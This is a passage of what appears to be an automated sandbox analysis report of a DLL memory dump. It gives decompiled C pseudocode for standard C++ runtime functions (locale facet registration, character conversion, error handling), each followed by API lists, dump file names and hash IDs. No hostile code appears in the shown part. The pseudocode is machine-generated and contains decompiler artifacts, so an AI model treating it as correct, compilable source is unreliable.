									__eflags = E6DDDA9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t161, _t215, _t221, 0x14);
										E6DDD6653( &_v20, 0);
										_t222 =  *0x6de96ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6DDB161C(0x6de96cb8);
										_t178 = _a8;
										_t216 = E6DDB171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438( &_v32);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t161, _t216, _t222, 0x14);
													E6DDD6653( &_v20, 0);
													_t223 =  *0x6de96cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6DDB161C(0x6de96cbc);
													_t185 = _a8;
													_t217 = E6DDB171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6DDD66BA( &_v20);
														return E6DDF0075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6DDDAAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438( &_v32);
																E6DDF3D74( &_v32, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t161, _t217, _t223, 0x14);
																E6DDD6653( &_v20, 0);
																_t224 =  *0x6de96cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6DDB161C(0x6de96cc0);
																_t192 = _a8;
																_t218 = E6DDB171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6DDD66BA( &_v20);
																	return E6DDF0075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6DDDAB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6DDB1438(_t196);
																			E6DDF3D74( &_v32, 0x6de93504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6de3ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6DDD6FD3(__eflags, _t218);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6de96cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6DDD6FD3(__eflags, _t217);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6de96cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t216);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6de96ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t215);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6de96cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t214);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6de96cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA060
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA06A
int.LIBCPMT ref: 6DDDA081

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDA0A4
std::_Facet_Register.LIBCPMT ref: 6DDDA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA0F9

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: b76bb4d383eff6eab2d90ca5f56578182d69aab4f1542592980d83d2bcce9b07
Instruction ID: 7be3cc326aec7e48e3d7ee1cb679a32b68b3b7e0ffdd710f85e3806aa0e47c20
Opcode Fuzzy Hash: b76bb4d383eff6eab2d90ca5f56578182d69aab4f1542592980d83d2bcce9b07
Instruction Fuzzy Hash: B311A376845119DBCF01FB64C840ABDB774AF54714F264409F511BB290DF749905C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6DDDA2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t52 =  *0x6de96cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6DDB161C(0x6de96cc0);
				_t40 = _a8;
				_t22 = E6DDB171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6DDB1438(_t44);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6de3ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t50);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6de96cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
int.LIBCPMT ref: 6DDDA319

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDA33C
std::_Facet_Register.LIBCPMT ref: 6DDDA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA391

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 8bea813ad8111ae6e1886fd90ab2a867af19652c378264e9144d7225030b89f5
Instruction ID: 85bd4964444798d3d36a94313e3e4f6fe62d2968a05bc83804077c70f5d24f54
Opcode Fuzzy Hash: 8bea813ad8111ae6e1886fd90ab2a867af19652c378264e9144d7225030b89f5
Instruction Fuzzy Hash: DA11C275909229DBCF01FBA4C840EFDB7B5AF55318F264409F611AB290DF74AA02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6DE2621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6DE16BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6DDEF8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6DDDDEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6DE24640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6DDDDEE1(_t100);
									goto L36;
								}
								_t62 = E6DE24640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6DDDDEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6DE1F26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6DDF01B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6DE24640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6DE1F26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6DDF01B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6DE0F290,6DE0F290,?,?,?,6DE26470,00000001,00000001,C5E85006), ref: 6DE26279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6DE26470,00000001,00000001,C5E85006,?,?,?), ref: 6DE262FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6DE263F9
__freea.LIBCMT ref: 6DE26406

Part of subcall function 6DE1F26D: HeapAlloc.KERNEL32(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

__freea.LIBCMT ref: 6DE2640F
__freea.LIBCMT ref: 6DE26434

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: d1a7bb0d5b7ae54dd9a9564ed6df86e5e02dfe568539fb33cbd270bdbe6a5861
Instruction ID: a48f696055bdb0d6cf257d5a19897a6c62e2f6985eaa3b743e5ba3b883be2494
Opcode Fuzzy Hash: d1a7bb0d5b7ae54dd9a9564ed6df86e5e02dfe568539fb33cbd270bdbe6a5861
Instruction Fuzzy Hash: E051AE72610216ABEF198F64CC40FBB37A9EB84758B22432DFD54E6240DF74DC5586E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE123DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6DE123DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6DE24E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6DE1C7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6DE1CBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6DE24E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6DE1E486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6DE12188();
							asm("int3");
							E6DDF0990(_t97, _t123, 0x6de92bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6DE123DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6DE1D5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6DE250ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6DE1F26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6DE250ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6DE12361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6DE1CBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6de952ec & 0x00000001;
												if(( *0x6de952ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6DE1CBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6DE125CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6DE1CBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6DE12188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6DDF09D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6DE1E486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

APIs

__cftoe.LIBCMT ref: 6DE12409
__cftoe.LIBCMT ref: 6DE1243B

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 8f843ff95a672e97a42f8f3333feeee227e2a3f39ad063e2f1f0a7b0a2cec7cc
Instruction ID: 8fc80163693dfb611218e986595563544f780d20dd0390df58bce2ae88121cbc
Opcode Fuzzy Hash: 8f843ff95a672e97a42f8f3333feeee227e2a3f39ad063e2f1f0a7b0a2cec7cc
Instruction Fuzzy Hash: 5651EA32B0C216ABDB258B688C42EBE77B9AF5B32CF71411DE925F6281DF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF42C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6DDF42C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6de95090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6DDF56A9(__eflags,  *0x6de95090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6DDF56E4(__eflags,  *0x6de95090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6DDFB9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6DDF56E4(__eflags,  *0x6de95090, 0);
								} else {
									__eflags = E6DDF56E4(__eflags,  *0x6de95090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6DE11DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,6DDF3EDB,6DDEFA25,6DDEFD54,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E), ref: 6DDF42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DDF42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DDF42FD
SetLastError.KERNEL32(00000000,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDF434F

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 09fe271c6fb6809dcae415d77db46eeee4cd319af7e06215d88df79d3030a3cc
Instruction ID: 0a0898ca8aaf7780835daf699c228aa51d5735cdf4f2104252a4fc61a2e5fdd9
Opcode Fuzzy Hash: 09fe271c6fb6809dcae415d77db46eeee4cd319af7e06215d88df79d3030a3cc
Instruction Fuzzy Hash: E601D43224E726DFEA1437B4ADA5B7626F5EB0777A723022BF224490E4EF1148139194

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t286 - 0x14, 0);
				_t273 =  *0x6de96ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6DDB161C(0x6de96d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6DDD66BA(_t286 - 0x14);
					return E6DDF0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6DDE1409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t286 - 0x20);
							E6DDF3D74(_t286 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t266, _t273, 0x14);
							E6DDD6653(_t286 - 0x14, 0);
							_t274 =  *0x6de96de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6DDB161C(0x6de96d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6DDD66BA(_t286 - 0x14);
								return E6DDF0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6DDE1471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t286 - 0x20);
										E6DDF3D74(_t286 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t203, _t267, _t274, 0x14);
										E6DDD6653(_t286 - 0x14, 0);
										_t275 =  *0x6de96dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6DDB161C(0x6de96da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6DDB171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6DDD66BA(_t286 - 0x14);
											return E6DDF0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6DDE14EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t286 - 0x20);
													E6DDF3D74(_t286 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t203, _t268, _t275, 0x14);
													E6DDD6653(_t286 - 0x14, 0);
